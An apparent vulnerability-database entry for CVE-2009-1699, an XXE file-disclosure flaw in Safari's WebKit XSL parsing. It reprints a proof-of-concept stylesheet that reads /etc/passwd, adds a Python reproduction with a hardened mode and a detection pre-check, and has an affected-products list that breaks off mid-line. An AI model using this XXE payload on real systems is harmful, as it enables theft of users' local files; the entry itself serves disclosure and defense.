Apple Safari WebKit "XSL" Stylesheet Feature File Read and Information Disclosure Vulnerability

Vulnerability ID: 1117732    Vulnerability type: Information disclosure
Published: 2009-05-08    Updated: 2010-02-03
CVE ID: CVE-2009-1699    CNNVD ID: CNNVD-200906-183
Platform: Linux    CVSS score: 7.1
|Vulnerability source
https://www.exploit-db.com/exploits/33034
https://www.securityfocus.com/bid/35321
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-183
|Vulnerability details
Safari is the web browser bundled by default with Apple's operating systems. The WebKit engine used by Apple Safari is vulnerable to XML External Entity (XXE) injection when it parses XML: a remote attacker can read arbitrary files from the user's system by supplying a specially crafted DTD. As the exploit below shows, the DTD is carried in an XSL stylesheet that an attacker-served XML page references through an xml-stylesheet processing instruction; the stylesheet parser resolves a file: SYSTEM entity and inlines the file's contents into the transformed page, where the attacker's script can read and exfiltrate them. Safari 4 shipped the fix (APPLE-SA-2009-06-08-1).
|Vulnerability EXP
source: http://www.securityfocus.com/bid/35321/info

WebKit is prone to a remote information-disclosure vulnerability.

An attacker can exploit this issue to obtain sensitive information that may aid in further attacks.

NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it. 

Safari prior to version 4 may permit an evil web page to steal files
from the local system.

This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>

Full technical details: http://scary.beasts.org/security/CESA-2009-006.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)

Cheers
Chris
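The XXE mechanism above, as an added example that is not part of Chris Evans' writeup or of WebKit's code: Python's expat parser stands in for the stylesheet parser. In permissive mode it resolves the file: SYSTEM entity declared in the DTD and splices the file into the stylesheet's character data, which is the text a transformed page would hand to script; in hardened mode the external reference is refused before any file is opened. A separate pre-check lists the external entity declarations so a consumer can reject such a document outright. The secret file is a constructed temp file standing in for /etc/passwd, the file: handling assumes a POSIX path, and the function and exception names are the example's own.

```python
"""Reproduce the XXE mechanism behind CVE-2009-1699 with Python's expat.

Added example, not the advisory's or WebKit's code. The "browser" here is
expat driven by Python: with allow_external=True it resolves a SYSTEM entity
declared in the stylesheet's DTD and splices the file into the character
data (what the transformed page would expose to script); with
allow_external=False the external reference is refused before any file
is read.
"""
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse, unquote


class ExternalEntityBlocked(Exception):
    """Raised when a document tries to pull in an external entity."""


def evil_stylesheet(target_uri):
    # Same shape as the stylesheet in the advisory, with the file URI
    # parameterised so the demo can point at a constructed temp file.
    return f"""<!DOCTYPE doc [ <!ENTITY ent SYSTEM "{target_uri}"> ]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html><body>
<p>Below you should see the content of a local file:</p>
&ent;
  </body></html>
</xsl:template>
</xsl:stylesheet>""".encode()


def external_entity_decls(xml_bytes):
    """Defensive pre-check: list every external (SYSTEM/PUBLIC) entity the
    DTD declares, without resolving any of them. No ExternalEntityRefHandler
    is registered, so expat skips the reference instead of following it."""
    found = []

    def decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append((name, system_id))

    p = expat.ParserCreate()
    p.EntityDeclHandler = decl
    p.Parse(xml_bytes, True)
    return found


def parse_like_browser(xml_bytes, allow_external):
    """Parse the stylesheet and return its character data.

    allow_external=True mimics the vulnerable WebKit: a file: SYSTEM entity
    is opened and its bytes replace &ent; in the output.
    allow_external=False refuses the reference and raises
    ExternalEntityBlocked (hypothetical name for this example)."""
    text = []
    blocked = []
    p = expat.ParserCreate()
    p.CharacterDataHandler = text.append

    def ext_ref(context, base, system_id, public_id):
        if not allow_external:
            blocked.append(system_id)
            return 0                       # 0 makes expat abort the parse
        url = urlparse(system_id)
        if url.scheme != "file":           # the demo only follows file: URIs
            blocked.append(system_id)
            return 0
        with open(unquote(url.path), "rb") as fh:   # POSIX path assumed
            data = fh.read()
        # The file is parsed as an external parsed entity; the sub-parser
        # shares our handlers, so its character data lands in `text`.
        sub = p.ExternalEntityParserCreate(context)
        sub.Parse(data, True)
        return 1

    p.ExternalEntityRefHandler = ext_ref
    try:
        p.Parse(xml_bytes, True)
    except expat.ExpatError:
        if blocked:
            raise ExternalEntityBlocked(blocked[0]) from None
        raise
    return "".join(text)


def demo():
    """Run both modes against a constructed secret file; returns
    (leaked_text, was_blocked, declared_external_entities)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "passwd")
        with open(secret, "w") as fh:
            # Constructed stand-in for /etc/passwd, not a real account entry.
            fh.write("root:x:0:0:root:/root:/bin/sh\n")
        payload = evil_stylesheet("file://" + secret)
        leaked = parse_like_browser(payload, allow_external=True)
        try:
            parse_like_browser(payload, allow_external=False)
            was_blocked = False
        except ExternalEntityBlocked:
            was_blocked = True
        return leaked, was_blocked, external_entity_decls(payload)


if __name__ == "__main__":
    leaked, was_blocked, decls = demo()
    print("declared external entities:", decls)
    print("permissive parse leaked:", repr(leaked.strip()))
    print("hardened parse blocked the reference:", was_blocked)
```

Two caveats carry over to the real bug. The stolen file is parsed as an external parsed entity, so a file containing a bare `&` or `<` aborts the parse instead of leaking (the classic XXE limitation; /etc/passwd happens to be safe text). And the pre-check flags the attempt regardless of the file's contents: a stylesheet has no business declaring external entities, so a consumer can reject any DOCTYPE that does before the transform runs.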
|Affected products
WebKit Open Source Project WebKit 0
Ubuntu Ubuntu Linux 9.04 sparc
Ubuntu Ubuntu Linux 9.04 powerpc
Ubuntu Ubuntu Linux 9.04 lpia
Ubuntu Ubuntu Linux 9.04 i386
Ubuntu Ubu
|References

Source: VUPEN
Name: ADV-2009-1522
Link: http://www.vupen.com/english/advisories/2009/1522
Source: support.apple.com
Link: http://support.apple.com/kb/HT3613
Source: APPLE
Name: APPLE-SA-2009-06-08-1
Link: http://lists.apple.com/archives/security-announce/2009/jun/msg00002.html
Source: VUPEN
Name: ADV-2009-1621
Link: http://www.vupen.com/english/advisories/2009/1621
Source: BID
Name: 35321
Link: http://www.securityfocus.com/bid/35321
Source: BID
Name: 35260
Link: http://www.securityfocus.com/bid/35260
Source: MILW0RM
Name: 8907
Link: http://www.milw0rm.com/exploits/8907
Source: support.apple.com
Link: http://support.apple.com/kb/HT3639
Source: SECUNIA
Name: 35379
Link: http://secunia.com/advisories/35379
Source: MISC
Link: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
Source: MISC
Link: http://scary.beasts.org/security/CESA-2009-006.html
Source: OSVDB
Name: 54972
Link: http://osvdb.org/54972
Source: APPLE
Name: APPLE-SA-2009-06-17-1
Link: http://lists.apple.com/archives/security-announce/2009/Jun/msg00005.html